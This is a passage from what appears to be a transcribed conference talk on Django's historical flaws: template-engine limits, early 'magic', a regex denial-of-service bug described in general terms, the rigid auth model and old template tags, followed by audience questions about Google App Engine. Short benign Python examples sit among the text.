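TAG_RE = re.compile(r"(\{%.*?%\}|\{\{.*?\}\}|\{#.*?#\})")


def tokenize(source):
    tokens = []
    # With a capturing group, split() alternates: text, tag, text, tag, ...
    for index, bit in enumerate(TAG_RE.split(source)):
        if index % 2 == 0:
            if bit:
                tokens.append(("text", bit))
        elif bit.startswith("{{"):
            tokens.append(("var", bit[2:-2].strip()))
        elif bit.startswith("{%"):
            tokens.append(("block", bit[2:-2].strip()))
        else:
            tokens.append(("comment", bit[2:-2].strip()))
    return tokens


print(tokenize("Hello {{ name }}!"))
print(tokenize("{# a {# b #} c #}"))
```

In the second call the comment ends at the first closing delimiter, and the rest of the intended comment comes out as ordinary text, which is the kind of nesting a real lexer and parser pair would handle.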
It's also not very efficient at doing includes. It doesn't compile templates, it just interprets them. It's generally quite slow. One of the old big sites that used Django before they went away had about 200 includes in every template page, and they took about one and a half seconds sometimes. So it's really not brilliant.
It's kind of been bolted on and patched around, so there's now a caching template renderer. But that's not really the solution to the problem. There have been discussions of possibly improving it a bit more internally. But the problem is it's very hard to change while still being 100% backwards compatible, which of course is very important for Django. Because people rely on us not to just change things
underneath their feet so that they can't upgrade. But hopefully we'll fix that soon. Ah, the ugly, even better. Magic. Django, when it was first released in 2005, had a lot of magic. You defined models, and they magically appeared over here in a different namespace, which is where you imported them from. You defined template tags, and they magically appeared over here.
This wasn't very good. People didn't know how things appeared. You couldn't trace them back very easily. If a model just appeared in Django.meta, you had no idea where it actually came from. And so there was a very popular thing called the magic removal, where the magic was taken out of Django, or most of it. So these days it's a lot better.
You can tell where things come from. You can easily trace errors back to where they actually came from rather than to some other module. But that was quite nasty for a while. Too many regular expressions. I love regular expressions, but they can get a bit long. So there are several very long regular expressions in the core Django code. The URL resolver has one.
It runs on regular expressions, so that's probably fine. Not sure it should, but that's generally accepted to be all right. But one of our most recent security vulnerabilities, in sort of mid last year, was the email regex. So this is our email regex. The top one is vulnerable to a denial-of-service attack.
The bottom one is not. If you can spot the difference, the difference is actually this clause here, which limits the length of this particular part. If you don't have that there, your regular expression does backtracking, and the longer the domain string you put in, the longer it takes.
If you put three or four hundred characters in, the top one would run for several minutes and just die. So yeah, that's the problem, and we spent a good three or four days on and off trying to work out what the hell was wrong and how to fix it, because it's not particularly editable. But yes, I personally think we should have,
for email validation: does the string contain an @? Yes? It's probably an email. Because we can't test whether there's actually a valid mailbox at the end of that address, let's just test whether it looks like one. Most errors are going to be users typing usernames or web addresses instead. And I just think doing this kind of checking
is a bit excessive. Also, it only allows TLDs that are up to six characters long. So .museum is fine, but if you invent a seven-letter one, all the old versions of Django aren't going to work. So yeah, not brilliant. Auth is a big bugbear of mine. This is like a personal vendetta thing now.
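The "does it contain an @" check suggested here needs no regular expression at all. A minimal sketch follows; `looks_like_email` is a hypothetical helper, and the 254-character cap is an assumption added for this example rather than something from the talk.

```python
def looks_like_email(value, max_length=254):
    """Cheap plausibility check: bounded length, one '@', something on each side."""
    if len(value) > max_length:
        return False
    local, at, domain = value.partition("@")
    return bool(at and local and domain and "@" not in domain)


print(looks_like_email("curator@example.museum"))
print(looks_like_email("just-a-username"))
```

The work done is proportional to the length of the input, so there is no backtracking to exploit, and it makes no assumption about how long a top-level domain may be.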
So auth inside Django is fixed. It's fixed to having a first name and a last name, which is already stupid for internationalization. First name and last name is a very Western thing to start with. It's fixed to having a single email address and a password. The email address is required, as is the password.
And it's also fixed to having a few other attributes. And you can't change this. You can't go to Django and say, I also want an age field, or I also want a website URL field. You have to make a different model and link it in. And there's no way of getting rid of auth and doing your own one without completely removing it, which you can do, and then either replicating all of the same API
or writing your own code that uses a different API. There's been some discussion about how to make this better. There's been the idea of extendable models, but doing that in a way that's not crazy is very difficult. We don't want too much crazy; crazy is bad. So it's a difficult problem, and it's a bit ugly, because you end up with these one-to-one relationships
that really should be one table, like a profile model. There's even a hack where you say, this is my profile model, and Django adds special shortcuts to get it from a user. But it's just a workaround for the problem. The old template language was fascinating. So rather than having an if tag that just did equality, less than, greater than,
nah, that was bad. The if tag just did Boolean testing; it took one variable. If you wanted to do equals, there was an ifequal tag. That's fine, right? ifequal a b. You want to do not equal to? Yes, use ifnotequal. And in Django, every block tag ends with an end tag named after it. And so if you want to do lots of negated equality expressions, your template code is littered
with endifnotequal tags, which is not the best way to do ifs. Thankfully, in 1.2, was it 1.3? 1.2, we introduced smart if, which actually does such modern things as double equals and less than and things like that. The template language shouldn't have that much logic, but I think that was going a bit too far.
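For comparison, here are the two styles side by side, held as Python strings so they can sit next to each other. The variable `user.name` and the markup are invented for the example; only the tag names come from the talk.

```python
# Old style: one dedicated tag per comparison, each with its own end tag.
OLD_STYLE = """
{% ifnotequal user.name "admin" %}
  <p>Welcome, guest.</p>
{% endifnotequal %}
"""

# Smart if: the comparison operator lives inside a plain if tag.
NEW_STYLE = """
{% if user.name != "admin" %}
  <p>Welcome, guest.</p>
{% endif %}
"""

print(OLD_STYLE)
print(NEW_STYLE)
```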
But the question here is, you know, Django has had a lot of problems. We've had a lot of them and we've solved a lot of them as well. Are there lessons to be learned here? Not really. When Django was initially released, it had a very different purpose to what it does now. It was used on a few websites in house. It worked fine for those.
And in fact, it worked well enough that people were impressed by it and really got enthused by how good it was. But I think every framework and every software application develops over time. And you get the horrible bits of code and regular expressions that you can't debug lying around. But I think in general, you know,
you have to realize that for a project, not everything needs fixing now. I know a lot of people who just sit there and refuse to release software until it's perfect. Software is never perfect. I think we all know that. Open source software is never done. And if we'd sat there and not released until all those problems I just talked about had been fixed, Django 1.0 still wouldn't have happened
five, six years later. So, you know, it's one of those things. And from what I've seen over the last three years, you improve by being consistent, sometimes even at the expense of being a little ugly or a little bad. In the end, yes, the template language is ugly, but it's been the same for three or four years
and you can still use it and your application still mostly runs. Don't get carried away writing new features. We got carried away for a while. That was bad. Lots of bugs piled up. We're fixing that now. New features are great, but they're only great if the old ones still work at the same time. And also, people with lots of free time: that's very handy for an open source project.
For a while, Django had a bit of a lack of resources. Thankfully that's mostly improved now. But never underestimate the number of developers and resources you need, especially if you think you're all right. Remember, it takes a few months or a few years to bring new people into the fold and get them up to speed.
And by the time you get there, you may realize you've been a bit too late. So, thank you for that. I hope you've learned something from this. If not, then I'm sorry. Feel free to ask any questions. I'm happy to defend my position. And thank you very much.
Any questions? So Google App Engine is using a quite old version. I think it's 0.96.
Is there any communication with them, to let them know that? Okay, so the question was: Google App Engine is using a very old version of Django, which is 0.96. Is there any communication with them to try and fix that? There has been a bit. With App Engine, thankfully, these days you can get your own version of Django in there by zipping it up and sticking it in.
Some people have tried to poke them. They haven't done very much. App Engine seems to be a bit of a, they've only just started doing new features again. So I'm not sure what the state of that is, but I think they've just left it in there because, just because. I mean, these days, I think they recommend you bring your own Django, so.
Thank you very much.